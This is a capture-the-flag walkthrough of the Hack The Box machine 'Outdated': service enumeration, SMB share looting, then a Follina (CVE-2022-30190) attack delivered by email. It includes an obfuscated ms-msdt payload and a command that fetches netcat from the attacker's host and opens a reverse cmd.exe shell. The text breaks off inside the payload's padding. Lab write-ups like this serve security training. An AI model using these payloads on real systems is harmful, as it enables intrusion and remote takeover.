HTB Outdated Walkthrough
A really very interesting Windows BOX, some difficult passages and an unstable machine, but fun and with many exploits available. Let's start.
The nmap scan:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-16 11:20 CESTNote: Host seems down. If it is really up, but blocking our ping probes, try -PnNmap done: 1 IP address (0 hosts up) scanned in 4.36 secondsWindows, what fascinating machines (ironic). Let's force the scan and try again.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-16 11:21 CESTNmap scan report for 10.10.11.175Host is up (0.11s latency).Not shown: 988 filtered tcp ports (no-response)PORT STATE SERVICE VERSION25/tcp open smtp hMailServer smtpd| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-16 16:04:25Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED| Not valid before: 2022-06-18T05:50:24|_Not valid after: 2024-06-18T06:00:24|_ssl-date: 2022-08-16T16:05:48+00:00; +6h42m37s from scanner time.445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)|_ssl-date: 2022-08-16T16:05:47+00:00; +6h42m37s from scanner time.| ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED| Not valid before: 2022-06-18T05:50:24|_Not valid after: 2024-06-18T06:00:243268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED| Not valid before: 2022-06-18T05:50:24|_Not valid after: 2024-06-18T06:00:24|_ssl-date: 2022-08-16T16:05:48+00:00; +6h42m37s from scanner time.3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)|_ssl-date: 2022-08-16T16:05:48+00:00; +6h42m38s from scanner time.| ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED| Not valid before: 2022-06-18T05:50:24|_Not valid after: 2024-06-18T06:00:24Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 6h42m37s, deviation: 0s, median: 6h42m36s| smb2-security-mode: | 3.1.1: |_ Message signing enabled and required| smb2-time: | date: 2022-08-16T16:05:08|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 111.12 secondsThe first strange thing you can notice is a large number of open ports, but no http ports; no portal. This confirms to me that it will be a nice BOX to solve. Let's see what services we will have to provide.
Port 25 - mail server
Port 25 is confirmed to be the port of an SMTP server.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.175 - Outdated (win)]└─$ telnet 10.10.11.175 25 130 ⨯Trying 10.10.11.175...Connected to 10.10.11.175.Escape character is '^]'.220 mail.outdated.htb ESMTPehlo in7rud3r.com250-mail.outdated.htb250-SIZE 20480000250-AUTH LOGIN250 HELPPort 53 - DNS Server
Port 53 also confirms its nature, I try to query the DNS server for some more information.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.175 - Outdated (win)]└─$ fierce --domain outdated.htb --dns-servers 10.10.11.175NS: dc.outdated.htb.SOA: dc.outdated.htb. (172.16.20.1)Zone: failureWildcard: failureFound: client.outdated.htb. (172.16.20.20)Found: dc.outdated.htb. (10.10.11.175)Found: mail.outdated.htb. (172.16.20.1)Perfectly, some domains are starting to come out. Go on. I prepare a small script to interrogate as much as possible and get as much information as possible.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.175 - Outdated (win)/attack/dns]└─$ cat scan.sh dig ANY @10.10.11.175 outdated.htb #Any informationdig A @10.10.11.175 outdated.htb #Regular DNS requestdig AAAA @10.10.11.175 outdated.htb #IPv6 DNS requestdig TXT @10.10.11.175 outdated.htb #Informaeiondig MX @10.10.11.175 outdated.htb #Emails relateddig NS @10.10.11.175 outdated.htb #DNS that resolves that namedig -x 10.10.11.175 @10.10.11.175 #Reverse lookup┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.175 - Outdated (win)/attack/dns]└─$ ./scan.sh ; <<>> DiG 9.18.4-2-Debian <<>> ANY @10.10.11.175 outdated.htb; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24574;; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 5;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTION SECTION:;outdated.htb. IN ANY;; ANSWER SECTION:outdated.htb. 600 IN A 172.16.20.1outdated.htb. 600 IN A 10.10.11.175outdated.htb. 3600 IN NS dc.outdated.htb.outdated.htb. 3600 IN SOA dc.outdated.htb. hostmaster.outdated.htb. 306 900 600 86400 3600outdated.htb. 600 IN AAAA dead:beef::1dfoutdated.htb. 600 IN AAAA dead:beef::18e:4256:3d66:b554;; ADDITIONAL SECTION:dc.outdated.htb. 3600 IN A 10.10.11.175dc.outdated.htb. 3600 IN A 172.16.20.1dc.outdated.htb. 3600 IN AAAA dead:beef::1dfdc.outdated.htb. 3600 IN AAAA dead:beef::18e:4256:3d66:b554;; Query time: 108 msec;; SERVER: 10.10.11.175#53(10.10.11.175) (TCP);; WHEN: Tue Aug 16 11:54:41 CEST 2022;; MSG SIZE rcvd: 281; <<>> DiG 9.18.4-2-Debian <<>> A @10.10.11.175 outdated.htb; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11095;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTION SECTION:;outdated.htb. IN A;; ANSWER SECTION:outdated.htb. 600 IN A 172.16.20.1outdated.htb. 600 IN A 10.10.11.175;; Query time: 112 msec;; SERVER: 10.10.11.175#53(10.10.11.175) (UDP);; WHEN: Tue Aug 16 11:54:42 CEST 2022;; MSG SIZE rcvd: 73; <<>> DiG 9.18.4-2-Debian <<>> AAAA @10.10.11.175 outdated.htb; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11778;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTION SECTION:;outdated.htb. IN AAAA;; ANSWER SECTION:outdated.htb. 600 IN AAAA dead:beef::1dfoutdated.htb. 600 IN AAAA dead:beef::18e:4256:3d66:b554;; Query time: 112 msec;; SERVER: 10.10.11.175#53(10.10.11.175) (UDP);; WHEN: Tue Aug 16 11:54:42 CEST 2022;; MSG SIZE rcvd: 97; <<>> DiG 9.18.4-2-Debian <<>> TXT @10.10.11.175 outdated.htb; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42903;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTION SECTION:;outdated.htb. IN TXT;; AUTHORITY SECTION:outdated.htb. 3600 IN SOA dc.outdated.htb. hostmaster.outdated.htb. 306 900 600 86400 3600;; Query time: 108 msec;; SERVER: 10.10.11.175#53(10.10.11.175) (UDP);; WHEN: Tue Aug 16 11:54:42 CEST 2022;; MSG SIZE rcvd: 91; <<>> DiG 9.18.4-2-Debian <<>> MX @10.10.11.175 outdated.htb; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4812;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTION SECTION:;outdated.htb. IN MX;; AUTHORITY SECTION:outdated.htb. 3600 IN SOA dc.outdated.htb. hostmaster.outdated.htb. 306 900 600 86400 3600;; Query time: 108 msec;; SERVER: 10.10.11.175#53(10.10.11.175) (UDP);; WHEN: Tue Aug 16 11:54:42 CEST 2022;; MSG SIZE rcvd: 91; <<>> DiG 9.18.4-2-Debian <<>> NS @10.10.11.175 outdated.htb; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30448;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 5;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTION SECTION:;outdated.htb. IN NS;; ANSWER SECTION:outdated.htb. 3600 IN NS dc.outdated.htb.;; ADDITIONAL SECTION:dc.outdated.htb. 3600 IN A 172.16.20.1dc.outdated.htb. 3600 IN A 10.10.11.175dc.outdated.htb. 3600 IN AAAA dead:beef::18e:4256:3d66:b554dc.outdated.htb. 3600 IN AAAA dead:beef::1df;; Query time: 108 msec;; SERVER: 10.10.11.175#53(10.10.11.175) (UDP);; WHEN: Tue Aug 16 11:54:42 CEST 2022;; MSG SIZE rcvd: 146; <<>> DiG 9.18.4-2-Debian <<>> -x 10.10.11.175 @10.10.11.175;; global options: +cmd;; connection timed out; no servers could be reachedA few more domains seem to be coming out, but nothing particularly interesting at the moment. Let's write everything down and move on.
Ports 135, 593 - MSRPC
The RPC ports, but they won't let me through.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.175 - Outdated (win)/attack/dns]└─$ rpcclient 10.10.11.175Enter WORKGROUP\in7rud3r's password: Bad SMB2 signature for message[0000] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........[0000] 28 00 C0 80 F3 E1 4C 29 6F 31 75 5F 37 94 B1 7F (.....L) o1u_7...Cannot connect to server. Error was NT_STATUS_ACCESS_DENIEDPorts 139, 445 - SMB
The SAMBA protocol is a standard for Windows; it isalmost impossible for it to be missing. The enum4linux tool, however, does not detect anything. Let's try a manual survey, which is usually the best.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]└─$ smbclient --no-pass -L //10.10.11.175 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shares Disk SYSVOL Disk Logon server share UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.Reconnecting with SMB1 for workgroup listing.do_connect: Connection to 10.10.11.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)Unable to connect with SMB1 -- no workgroup availableWoooo, very interesting. There is a "Shares" and three other shares whose names are reminiscent of one of the most famous Windows services, the WSUS (Windows Server Update Services). It might be the vulnerability we're looking for, but let's not rush too much.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.175 - Outdated (win)/attack/smb]└─$ smbclient --no-pass //10.10.11.175/Shares Try "help" to get a list of possible commands.smb: \> dir . D 0 Mon Jun 20 17:01:33 2022 .. D 0 Mon Jun 20 17:01:33 2022 NOC_Reminder.pdf AR 106977 Mon Jun 20 17:00:32 2022 9116415 blocks of size 4096. 1487660 blocks availablesmb: \> get NOC_Reminder.pdf getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (135.1 KiloBytes/sec) (average 135.1 KiloBytes/sec)smb: \> exitIn the "Shares," we find a pdf that we download immediately. We only hope that it is not a virus.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.175 - Outdated (win)/attack/smb]└─$ smbclient --no-pass //10.10.11.175/UpdateServicesPackagesTry "help" to get a list of possible commands.smb: \> dirNT_STATUS_ACCESS_DENIED listing \*smb: \> exit ┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.175 - Outdated (win)/attack/smb]└─$ smbclient --no-pass //10.10.11.175/WsusContent Try "help" to get a list of possible commands.smb: \> dirNT_STATUS_ACCESS_DENIED listing \*smb: \> exit ┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.175 - Outdated (win)/attack/smb]└─$ smbclient --no-pass //10.10.11.175/WSUSTemp Try "help" to get a list of possible commands.smb: \> dirNT_STATUS_ACCESS_DENIED listing \*smb: \> exitThe other shares appear not to be accessible at the moment. Let's take a look at the pdf.
It seems to be the list of active vulnerabilities on the BOX... really? Do they make it so simple for us? Let's take a look at it.
- CVE-2022-30190 Exec Code 2022-06-01 9.3 Remote Medium Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.
- CVE-2022-30138 Exec Code 2022-05-18 7.2 Local Low Windows Print Spooler Elevation of Privilege Vulnerability.
- CVE-2022-30129 Exec Code 2022-05-10 6.8 Remote Medium Visual Studio Code Remote Code Execution Vulnerability.
- CVE-2022-29130 Exec Code 2022-05-10 9.3 Remote Medium Windows LDAP Remote Code Execution Vulnerability.
- CVE-2022-29110 Exec Code 2022-05-10 9.3 Remote Medium Microsoft Excel Remote Code Execution Vulnerability
After a quick search, excluding the second one, which appears to be a local attack, there don't seem to be many exploits available for the last three. The first seems to need user interaction (just like the one described in the message in the pdf, the support staff will analyze your report). Let's go ahead with the other doors open anyway; we will come back to this CVE later.
Ports 389, 636, 3268, 3269 - LDAP
Querying the LDAP service won't be easy, but let's see what we can find. Let's start with some simple queries using the libraries offered by python.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.175 - Outdated (win)/attack]└─$ python3 Python 3.9.13 (main, Jun 8 2022, 09:45:57) [GCC 11.3.0] on linuxType "help", "copyright", "credits" or "license" for more information.>>> import ldap3>>> server = ldap3.Server('10.10.11.175', get_info = ldap3.ALL, port =636, use_ssl = True)>>> connection = ldap3.Connection(server)>>> connection.bind()True>>> server.infoDSA info (from DSE): Supported LDAP versions: 3, 2 Naming contexts: DC=outdated,DC=htb CN=Configuration,DC=outdated,DC=htb CN=Schema,CN=Configuration,DC=outdated,DC=htb DC=DomainDnsZones,DC=outdated,DC=htb DC=ForestDnsZones,DC=outdated,DC=htb Supported controls: 1.2.840.113556.1.4.1338 - Verify name - Control - MICROSOFT 1.2.840.113556.1.4.1339 - Domain scope - Control - MICROSOFT[...] 1.2.840.113556.1.4.841 - Directory synchronization - Control - MICROSOFT 1.2.840.113556.1.4.970 - Get stats - Control - MICROSOFT 2.16.840.1.113730.3.4.10 - Virtual List View Response - Control - IETF 2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF Supported extensions: 1.2.840.113556.1.4.1781 - Fast concurrent bind - Extension - MICROSOFT 1.2.840.113556.1.4.2212 - Batch request - Extension - MICROSOFT 1.3.6.1.4.1.1466.101.119.1 - Dynamic Refresh - Extension - RFC2589 1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513 1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532 Supported features: 1.2.840.113556.1.4.1670 - Active directory V51 - Feature - MICROSOFT 1.2.840.113556.1.4.1791 - Active directory LDAP Integration - Feature - MICROSOFT 1.2.840.113556.1.4.1935 - Active directory V60 - Feature - MICROSOFT 1.2.840.113556.1.4.2080 - Active directory V61 R2 - Feature - MICROSOFT 1.2.840.113556.1.4.2237 - Active directory W8 - Feature - MICROSOFT 1.2.840.113556.1.4.800 - Active directory - Feature - MICROSOFT Supported SASL mechanisms: GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5 Schema entry: CN=Aggregate,CN=Schema,CN=Configuration,DC=outdated,DC=htbOther: domainFunctionality: 7 forestFunctionality: 7 domainControllerFunctionality: 7 rootDomainNamingContext: DC=outdated,DC=htb ldapServiceName: outdated.htb:[email protected] isGlobalCatalogReady: TRUE supportedLDAPPolicies: MaxPoolThreads MaxPercentDirSyncRequests MaxDatagramRecv MaxReceiveBuffer InitRecvTimeout MaxConnections MaxConnIdleTime MaxPageSize MaxBatchReturnMessages MaxQueryDuration MaxDirSyncDuration MaxTempTableSize MaxResultSetSize MinResultSets MaxResultSetsPerConn MaxNotificationPerConn MaxValRange MaxValRangeTransitive ThreadMemoryLimit SystemMemoryLimitPercent serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=outdated,DC=htb schemaNamingContext: CN=Schema,CN=Configuration,DC=outdated,DC=htb isSynchronized: TRUE highestCommittedUSN: 221543 dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=outdated,DC=htb dnsHostName: DC.outdated.htb defaultNamingContext: DC=outdated,DC=htb currentTime: 20220816184032.0Z configurationNamingContext: CN=Configuration,DC=outdated,DC=htbA lot of information has been recovered, but let's see if a more "user-friendly" tool can make our life easier. I will be using phpLDAPadmin in the containerized version.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.175 - Outdated (win)/attack]└─$ sudo docker run -p 6443:443 \ --env PHPLDAPADMIN_LDAP_HOSTS=10.10.11.175 \ --detach osixia/phpldapadmin:0.9.04dba5b569891e35f84c16785d16d37f75a4c230bf50af19fabd10c6aec1ffc69We start the browser and navigate the address http://localhost:6443/, log in anonymously and see if we can retrieve other information.
It seems that we are not so lucky; the scheme is not available, and it is not even possible to reach the organization unit (OU) of the users.
Let's go back to the list of exploits we initially found.
The Follina exploit
Okay, let's try to mix up the information we've collected so far and attempt an attack. The first CVE reported in the pdf (CVE-2022-30190) is a vulnerability known as "Follina" (we omit the explanation of the name, but its nature originates from my homeland, Italy) that exploits the MSDT service (Microsoft Support Diagnostic Tool), famously used as a support system in the Office suite tools. The exploit seems to be activated both by opening one of the Office files (Word, Excel, etc.) or by the script embedded in an HTML page. It is not yet clear how it will be activated on the target machine, but probably the payload will be more or less always the same, a reverse shell, and the channel to send the email will be the SMTP server on the BOX itself. The email must be sent to [email protected]. The first attempts are unsuccessful, attempting to first send a file in the attachment, then directly within the email, using a link that allows the file to be downloaded, but none of these seem to activate the exploit. I tried again and found a couple of really interesting links.
John Hammond, an invaluable source for this type of business, we could solve this time too with one of his tutorials.
GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload
Codebase to generate an msdt-follina payload. Contribute to JohnHammond/msdt-follina development by creating an account on GitHub.
JohnHammondLet's make some changes to his script to make it work also in the internal network of the HTB laboratory (we will never get to the github repository from the BOX).
command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""We then download the netcat for windows on our machine and make it available through the usual native php web server.
┌──(in7rud3r㉿kali-muletto)-[~/temp/msdt-follina]└─$ php -S 10.10.14.121:5000[Wed Aug 17 23:54:53 2022] PHP 8.1.5 Development Server (http://10.10.14.121:5000) startedThings immediately get more complicated than I expected; the script does not work on the first try. After investigating, I understand that it generates the attack payload automatically by selecting it from the eth0 interface (which, luckily for me, is not connected to the machine I use; otherwise, I would have lost hours trying to understand why it did not work; sometimes it is luck to have the ethernet not working). I just specify an additional parameter, indicating the right interface to use, and it all starts to make sense.
┌──(in7rud3r㉿kali-muletto)-[~/temp/msdt-follina]└─$ python3 follina.py -r 9001Traceback (most recent call last): File "/home/in7rud3r/temp/msdt-follina/follina.py", line 63, in main serve_host = ipaddress.IPv4Address(args.interface) File "/usr/lib/python3.9/ipaddress.py", line 1304, in __init__ self._ip = self._ip_int_from_string(addr_str) File "/usr/lib/python3.9/ipaddress.py", line 1191, in _ip_int_from_string raise AddressValueError("Expected 4 octets in %r" % ip_str)ipaddress.AddressValueError: Expected 4 octets in 'eth0'During handling of the above exception, another exception occurred:Traceback (most recent call last): File "/home/in7rud3r/temp/msdt-follina/follina.py", line 166, in <module> main(parser.parse_args()) File "/home/in7rud3r/temp/msdt-follina/follina.py", line 66, in main serve_host = netifaces.ifaddresses(args.interface)[netifaces.AF_INET][0][KeyError: 2 ┌──(in7rud3r㉿kali-muletto)-[~/temp/msdt-follina]└─$ python3 follina.py -h 1 ⨯usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] [--reverse REVERSE]optional arguments: -h, --help show this help message and exit --command COMMAND, -c COMMAND command to run on the target (default: calc) --output OUTPUT, -o OUTPUT output maldoc file (default: ./follina.doc) --interface INTERFACE, -i INTERFACE network interface or IP address to host the HTTP server (default: eth0) --port PORT, -p PORT port to serve the HTTP server (default: 8000) --reverse REVERSE, -r REVERSE port to serve reverse shell on ┌──(in7rud3r㉿kali-muletto)-[~/temp/msdt-follina]└─$ python3 follina.py -r 9001 -i tun0[+] copied staging doc /tmp/qx8q151c[+] created maldoc ./follina.doc[+] serving html payload on :8000[+] starting 'nc -lvnp 9001' listening on [any] 9001 ...I also prepare a script to send the email (although the commands are not too many, I already imagine that I will have to try several times).
#!/bin/bashfilename="./follina.doc"subject="Subject of my email"txtmessage="This is the message I want to send"{sleep 1;echo "EHLO mydomain.intra"sleep 1;echo "MAIL FROM:[email protected]"sleep 1;echo "RCPT TO:[email protected]"sleep 1;echo "DATA"sleep 1;echo "Subject:" $subjectsleep 1;echo "Content-Type: multipart/mixed; boundary="KkK170891tpbkKk__FV_KKKkkkjjwq""sleep 1;echo ""sleep 1;echo "This is a MIME formatted message. If you see this text it means that your"sleep 1;echo "email software does not support MIME formatted messages."sleep 1;echo ""sleep 1;echo "--KkK170891tpbkKk__FV_KKKkkkjjwq"sleep 1;echo "Content-Type: text/plain; charset=UTF-8; format=flowed"sleep 1;echo "Content-Disposition: inline"sleep 1;echo ""sleep 1;echo $txtmessagesleep 1;echo ""sleep 1;echo ""sleep 1;echo "--KkK170891tpbkKk__FV_KKKkkkjjwq"sleep 1;echo "Content-Type: file --mime-type -b filename-$(date +%y%m%d).zip; name=filename-$(date +%y%m%d).zip"sleep 1;echo "Content-Transfer-Encoding: base64"sleep 1;echo "Content-Disposition: attachment; filename="filename-$(date +%y%m%d).zip";"sleep 1;echo ""sleep 1;# The content is encoded in base64.cat $filename | base64;sleep 1;echo ""sleep 1;echo ""sleep 1;echo "--KkK170891tpbkKk__FV_KKKkkkjjwq--"sleep 1;echo ""sleep 1;echo "."sleep 1;echo "quit"} | telnet 10.10.11.175 25The script makes the exploit available both through a Word document and by exposing it as a script on a web server that starts automatically on port 80. I try to attach the word document anyway; the sending takes place, but the exploit does not seem to activate.
┌──(in7rud3r㉿kali-muletto)-[~/temp/msdt-follina]└─$ ./mailtelnet.sh Trying 10.10.11.175...Connected to 10.10.11.175.Escape character is '^]'.220 mail.outdated.htb ESMTP250-mail.outdated.htb250-SIZE 20480000250-AUTH LOGIN250 HELP250 OK250 OK354 OK, send.Connection closed by foreign host.I also try to use other tools for sending the email, such as the email or sendemail command, but they don't seem to work. After a series of attempts, I understand that the BOX seems to be able to reach only port 80 of the web servers.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/msdt-follina]└─$ sendEmail -t [email protected] -f [email protected] -s mail.outdated.htb -m 'http://10.10.14.112' Aug 19 12:15:57 kali-muletto sendEmail[2889]: Email was sent successfully!┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/msdt-follina]└─$ php -S 10.10.14.112:80 [Fri Aug 19 12:11:17 2022] PHP 8.1.5 Development Server (http://10.10.14.112:80) started[Fri Aug 19 12:11:31 2022] 10.10.11.175:49838 Accepted[Fri Aug 19 12:11:31 2022] 10.10.11.175:49838 [404]: GET / - No such file or directory[Fri Aug 19 12:11:31 2022] 10.10.11.175:49838 ClosingThe netcat that I then exposed on port 5000 will never be unloaded. Unfortunately, port 80 is occupied by the server running the Follina script. I have to stop it by making both the exploit and the netcat available on port 80 and trying again. I then retrieve the payload generated by the script before stopping the server.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/msdt-follina]└─$ curl http://localhost:8000 <script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cDovLzEwLjEwLjE0LjExMjo1MDAwL25jNjQuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcbmMuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXG5jLmV4ZSAtZSBjbWQuZXhlIDEwLjEwLjE0LjExMiA5MDAx'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //iuyvtfnzkeamhnztbkrvkrsrnallonssmjozwtusoavsamscmzhrgwxilcfrbxsdvzewbjqbhmtonsfysamztvlohmobuolmijvjiqvfpmwrztwdrsopdsczlzjkfwtnmpwuhjugejripqjvhhoawdyhmvcadufdchtrafgclfhzbwnfipomdojdhpzznpqmyruxouplcfwasjfvznivofsbxmmcrqyccxacshhzdavtkupdhojhnnghwnwvhsocnghalzuvlehhpmgxfzblhgwrphezifdjjixjcyuijvqdlltxlthiigqmwgpfhdxvtumthcstebabnsqgiuxahtbmnjvucdkavrpxndhrammvhnljgdpixqdiygreswmwkmjfywtmfocxvnggnqiraxxqcqfcudhilwtaigikoieiozkxpqyhzjltkqppypbctpwyiwitmwccuchsaswoqrsnmlwxxomlzrjrpfuswxqiagvjjleetijnclmlakyaoywlgwdfmqzbblswaohrhixtmsqvguvvpclwpibbaqjclkmtbzrmblkiyoofrhqkofglvcetmjgbrbpugrzborddgowphtazscqrnxaybtjgtgznrwgbkkilighnjxgmmjgwqngmeaqbxntcqpazymdygdqvrsdgtseaokhorfgmczarcfexmjuosmpbeonmtovozrqqgqrzlgzxdjivnmuvjnjwvmevxbhhlynzurplqbvulzfnjupzagradqgemeswaipananonoltdkxaaaiheqfajdddnebbhpdvbdeghbdsjgskvtkfnfxjftucfwifmksyynsmilzcrdvymztaymhkwawxermjbhocrbwkpdxcngfbzcpldmahipcjyeqqkjysvuqnlmtkphrgcchkjkdujgaxatoabsohnvdywmysmmoxanffqudzjqfprjzrxhoukvodquyakaublrsozvghjzhmxpyympsyarumfjtmfctahnykipbwetykbuuxxigbpqgbcbahbulufnppewvrdsztksvivzcczrzjojwhtngjqqhftqyocgoiyqablyitlpyukyjlguwcveecxvbbarympfhgoirutaspxcfkioqvneopxdlyfspqfuaaappblptcxlpupuauasvsqjimbpijertfzbpowjtolckavbqlvubdspeujbictrotqjrbneqtuxdfamwcjxzgdulreyhezqowrxpmmehpxylhsqerseydrbzcacgvlpfkmnoofdloqocphuykcccjvlrekghalrknosyrlialngtwcmhuanqomimstjbdritjzbmudtgnjkldtlicktrmcbvnknatknacaxfqymbboumngqngeicfkuyuhrvfpcgbyzbfthnxbazkdrxiljgqepuugqnkxoagkherwxcccuheyiprvgonpskmaqizfvcsmezjseqtrgfjjhsphsdfuotsghglfpojryloqfdvcrzmptnbhwxgiabllsedqojwisplijcjalmopgtnujmxviecwkukffhnyxsfaxftxvfyttglxqbxveinjbkchhdgdzoqvvxiuedlbvkjtdlvarixxizykjicnidusgwkwzcjydfgopwgnbduwszqyntdnqgewmqjcvzvpreczzgktehgtfgjinyytimbhwuldtxzzqbqtvhwytyacrupmfiwrumohcsgtzkvntubopncsogadbifgolvnnzjatbrvoirlksjdquhbvorvdsppcycrjqkesrbpiukblzfrmmvqplmwudnrxhtoxgjjklvxbwhyouzptjbcymvsybfbzksgczhrgodqucnkyaksikyofquxzptjeqadpdfnsmtjpgcukxcxmauotkwuuiovtbfnjunskgvtbkqxunvchuqnxxpnrfsemcvemngjdtfgfpspybbnepmvijvrchgisjfchewhsxmarxxiyswnxtalluxdyjmuubauttdsiwcdmpomcjotwutxpzrhgrnmenmnsxsfkfolazfynaxdbjmeeogczncoollpegbdzfjwsjxzcxhobvkfatzkusnaosbtvuegdoqrwtykiteuogyupstiazliohaghxdqhsejbslbodtrvvxsibwyysygbpbcdvmbdcceyklzqrlwrdwrwgajzhwhmntrcblsdvqhkrcjrgaowxjcbawbsdyelzylqynuxvcjiduaghzkwyemhjxzarxzbvptadqgmfysmzfzbwsjtlftuklibgaszhuganenkosngvictysdikjlziajsmahhhbshyjfkmyvsopoaxokfyrxovnexdlduqpoxqjklskfsbogrmypipnasarrjiniiceacjsamxobtgqkrrfjckapaxgqoyvecdbjaakblcvrhukrehgryecddrsyuuznxduanaknvxhfqnfojctweajcckvfclkrmteudohworfaaraqaikgpmvoaxrgkqqkshschyjgrfbcujpqxlsqgzogdpfcyvkjsnlskhihpwiueucxlhrtytsqpnoqaohkxrdylnlpokmwhkigxwvhgdvrktjdivykldqwjjdmxnrjtszexbqchzgrgdxgcvqzqwtkzlrrdnmcyklusvjpiacpr